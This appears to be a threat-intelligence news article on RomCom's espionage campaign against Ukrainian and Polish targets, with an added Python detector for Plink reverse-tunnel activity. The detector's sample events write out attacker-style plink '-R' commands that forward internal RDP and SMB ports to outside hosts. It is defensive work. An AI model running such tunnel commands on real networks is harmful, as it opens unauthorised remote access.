The Russian threat actor known as RomCom has been tied to a recent series of cyber attacks targeting Ukrainian government agencies and unidentified Polish entities since at least late 2023.
The breaches involve the use of a variant of the RomCom RAT called SingleCamper (also known as SnipBot or RomCom 5.0), according to Cisco Talos, which is tracking the activity cluster as UAT-5647.
“This version is loaded directly from the registry into memory and uses a loopback address to communicate with its loader,” security researchers Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer, and Vitor Ventura noted.
RomCom, also known as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has been involved in multi-purpose operations such as ransomware, extortion, and targeted credential theft since it first appeared in 2022.
The pace of the group's attacks has reportedly accelerated in recent months, with a focus on establishing long-term control over compromised networks and extracting data, indicating a clear espionage agenda.
The threat actor is expanding its toolset and infrastructure to accommodate a variety of malware components written in different languages and platforms, including C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE).
The attack sequence begins with a spear-phishing message that distributes a downloader in C++ (MeltingClaw) or Rust (RustyClaw), which then deploys ShadyHammock and DustyHammock backdoors. Simultaneously, a decoy document is presented to the recipient to maintain deception.
While DustyHammock communicates with a command-and-control (C2) server, executes commands, and downloads files, ShadyHammock serves as a platform for SingleCamper and listens for incoming directives.
Although ShadyHammock has additional functionalities, it is considered a precursor to DustyHammock, as the latter was observed in attacks as recently as September 2024.
SingleCamper, the latest iteration of RomCom RAT, carries out various post-compromise activities, including downloading PuTTY’s Plink tool to create remote tunnels with adversary-controlled infrastructure, network scanning, lateral movement, user and system identification, and data exfiltration.
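The Plink tunnelling described above leaves a recognisable trace in process-creation telemetry: the `-R [bind:]port:host:port` argument that exposes an internal service to the remote SSH end. The following detector is an added example, not code from Talos or from the article; it runs over constructed Sysmon-style events (`image|command line|parent image`), and the sanctioned install path, parent-process list and sample hosts are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample events in "image|command line|parent image" form (not real telemetry).
SAMPLE_EVENTS = [
    r"C:\Users\jdoe\AppData\Local\Temp\plink.exe|plink.exe -ssh -N -R 3389:127.0.0.1:3389 u@203.0.113.10 -pw s3cret|C:\Windows\System32\rundll32.exe",
    r"C:\Program Files\PuTTY\plink.exe|plink.exe -ssh -batch admin@bastion.corp.example uptime|C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\notepad.exe|notepad.exe C:\Users\jdoe\notes.txt|C:\Windows\explorer.exe",
    r"C:\ProgramData\svc\pl.exe|pl.exe -P 443 -R 0.0.0.0:445:localhost:445 -l x 198.51.100.7|C:\Windows\System32\rundll32.exe",
]

# "-R [bind:]port:host:port" is the Plink/OpenSSH syntax for a reverse (remote) port forward.
FORWARD_SPEC = re.compile(r"^(?:[\w.\-]+:)?\d{1,5}:[\w.\-]+:\d{1,5}$")
# Assumed: the only sanctioned PuTTY install locations in this environment.
TRUSTED_DIRS = ("c:\\program files\\putty\\", "c:\\program files (x86)\\putty\\")
# Assumed: parents that should never be launching an SSH client.
SUSPICIOUS_PARENTS = ("rundll32.exe", "winword.exe", "excel.exe", "outlook.exe")

@dataclass
class Finding:
    image: str
    severity: str
    reasons: List[str]

def analyze_event(line: str) -> Optional[Finding]:
    """Return a Finding when the command line sets up an SSH reverse tunnel, else None."""
    image, cmdline, parent = line.split("|", 2)
    args = cmdline.split()
    # The binary name is not trusted: a renamed plink still needs the -R spec to tunnel.
    reasons = [f"remote tunnel {nxt}" for flag, nxt in zip(args, args[1:])
               if flag == "-R" and FORWARD_SPEC.match(nxt)]
    if not reasons:
        return None
    severity = "medium"
    if not image.lower().startswith(TRUSTED_DIRS):
        reasons.append("tunnelling binary outside the sanctioned install path")
        severity = "high"
    if parent.lower().endswith(SUSPICIOUS_PARENTS):
        reasons.append(f"spawned by {parent.rsplit(chr(92), 1)[-1]}")
        severity = "high"
    if "-pw" in args:
        reasons.append("password supplied on the command line")
    return Finding(image, severity, reasons)

def scan(events: List[str]) -> List[Finding]:
    return [f for f in map(analyze_event, events) if f is not None]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.severity.upper(), f.image, "-", "; ".join(f.reasons))
```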
“These specific attacks, targeting prominent Ukrainian entities, are likely part of UAT-5647’s dual strategy of establishing long-term access for espionage purposes and extracting data for as long as possible, with a potential shift to ransomware deployment for disruption and financial gain,” the researchers stated.
“It is probable that Polish entities were also targeted, based on the malware’s keyboard language checks.”